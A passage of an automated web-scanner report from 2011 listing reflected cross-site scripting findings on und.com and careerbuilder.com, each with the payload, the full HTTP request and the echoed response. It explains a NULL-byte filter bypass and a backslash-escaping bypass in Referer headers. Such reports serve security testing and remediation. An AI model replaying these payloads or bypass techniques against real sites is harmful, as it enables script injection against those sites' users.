<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com%005370c"><script>alert(1)</script>1fbbb8b68cd/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.101. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0036ab8"><script>alert(1)</script>7f13e4a988e was submitted in the REST URL parameter 4. This input was echoed as 36ab8"><script>alert(1)</script>7f13e4a988e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sports/m-footbl/grfx.cstv.com/schools%0036ab8"><script>alert(1)</script>7f13e4a988e/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:35 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/schools%0036ab8"><script>alert(1)</script>7f13e4a988e/nd/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.102. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003477a"><script>alert(1)</script>b5f3b6e1451 was submitted in the REST URL parameter 5. This input was echoed as 3477a"><script>alert(1)</script>b5f3b6e1451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd%003477a"><script>alert(1)</script>b5f3b6e1451/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd%003477a"><script>alert(1)</script>b5f3b6e1451/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.103. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0053aec"><script>alert(1)</script>9887020dffd was submitted in the REST URL parameter 6. This input was echoed as 53aec"><script>alert(1)</script>9887020dffd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd/graphics%0053aec"><script>alert(1)</script>9887020dffd/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:38 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/graphics%0053aec"><script>alert(1)</script>9887020dffd/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.104. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92629"><script>alert(1)</script>466b89af49f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/92629"><script>alert(1)</script>466b89af49f HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:47 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/graphics/92629"><script>alert(1)</script>466b89af49f','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.105. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33e1"><script>alert(1)</script>59106a1eb00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportse33e1"><script>alert(1)</script>59106a1eb00/m-footbl/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportse33e1"><script>alert(1)</script>59106a1eb00/m-footbl/nd-m-footbl-body.html','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.106. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f3e"><script>alert(1)</script>1d9cd5ff859 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl52f3e"><script>alert(1)</script>1d9cd5ff859/nd-m-footbl-body.html HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl52f3e"><script>alert(1)</script>1d9cd5ff859/nd-m-footbl-body.html','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.107. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/nd-m-footbl-body.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8872"><script>alert(1)</script>1a0b9476a33 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/nd-m-footbl-body.htmld8872"><script>alert(1)</script>1a0b9476a33 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:43 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/nd-m-footbl-body.htmld8872"><script>alert(1)</script>1a0b9476a33','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.108. http://www.careerbuilder.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760d3\'%3balert(1)//6256a6e010 was submitted in the Referer HTTP header. This input was echoed as 760d3\\';alert(1)//6256a6e010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=760d3\'%3balert(1)//6256a6e010

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51678
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR23
Date: Sun, 04 Sep 2011 01:25:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
eName='JS_Home - ';
s_cb.server='www';
s_cb.channel='JS_Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 760d3\\';alert(1)//6256a6e010';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.109. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobPoster/Products/PostJobsInfo.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae719\'%3balert(1)//278deaa3ac4 was submitted in the Referer HTTP header. This input was echoed as ae719\\';alert(1)//278deaa3ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /JobPoster/Products/PostJobsInfo.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ae719\'%3balert(1)//278deaa3ac4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36528
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR36
Date: Sun, 04 Sep 2011 01:25:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
ntent';
s_cb.events='scOpen';
s_cb.prop1='SMB_ProdJobPosting';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar17='natural (google) - ae719\\';alert(1)//278deaa3ac4';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.110. http://www.careerbuilder.com/JobSeeker/Jobs/JobDetails.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobSeeker/Jobs/JobDetails.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f332d\'%3balert(1)//4d1d49b1000 was submitted in the Referer HTTP header. This input was echoed as f332d\\';alert(1)//4d1d49b1000 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /JobSeeker/Jobs/JobDetails.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f332d\'%3balert(1)//4d1d49b1000

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31143
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR3
Date: Sun, 04 Sep 2011 01:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
s_cb.channel='JS_FindJobs';
s_cb.prop1='My Job Recommendations';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - f332d\\';alert(1)//4d1d49b1000';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.111. http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobSeeker/Jobs/JobQuery.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99c17\'%3balert(1)//a7511effd3e was submitted in the Referer HTTP header. This input was echoed as 99c17\\';alert(1)//a7511effd3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /JobSeeker/Jobs/JobQuery.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=99c17\'%3balert(1)//a7511effd3e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 185170
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sun, 04 Sep 2011 01:26:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 99c17\\';alert(1)//a7511effd3e';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.112. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5782b\'%3balert(1)//ac6c016cb7e was submitted in the Referer HTTP header. This input was echoed as 5782b\\';alert(1)//ac6c016cb7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5782b\'%3balert(1)//ac6c016cb7e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34386
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEARWEB54
Date: Sun, 04 Sep 2011 01:25:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
Resumes - ';
s_cb.server='www';
s_cb.channel='JS_PostResumes';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 5782b\\';alert(1)//ac6c016cb7e';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.113. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/Jobseeker/Jobs/JobResults.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19088\'%3balert(1)//259c27b2205 was submitted in the Referer HTTP header. This input was echoed as 19088\\';alert(1)//259c27b2205 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

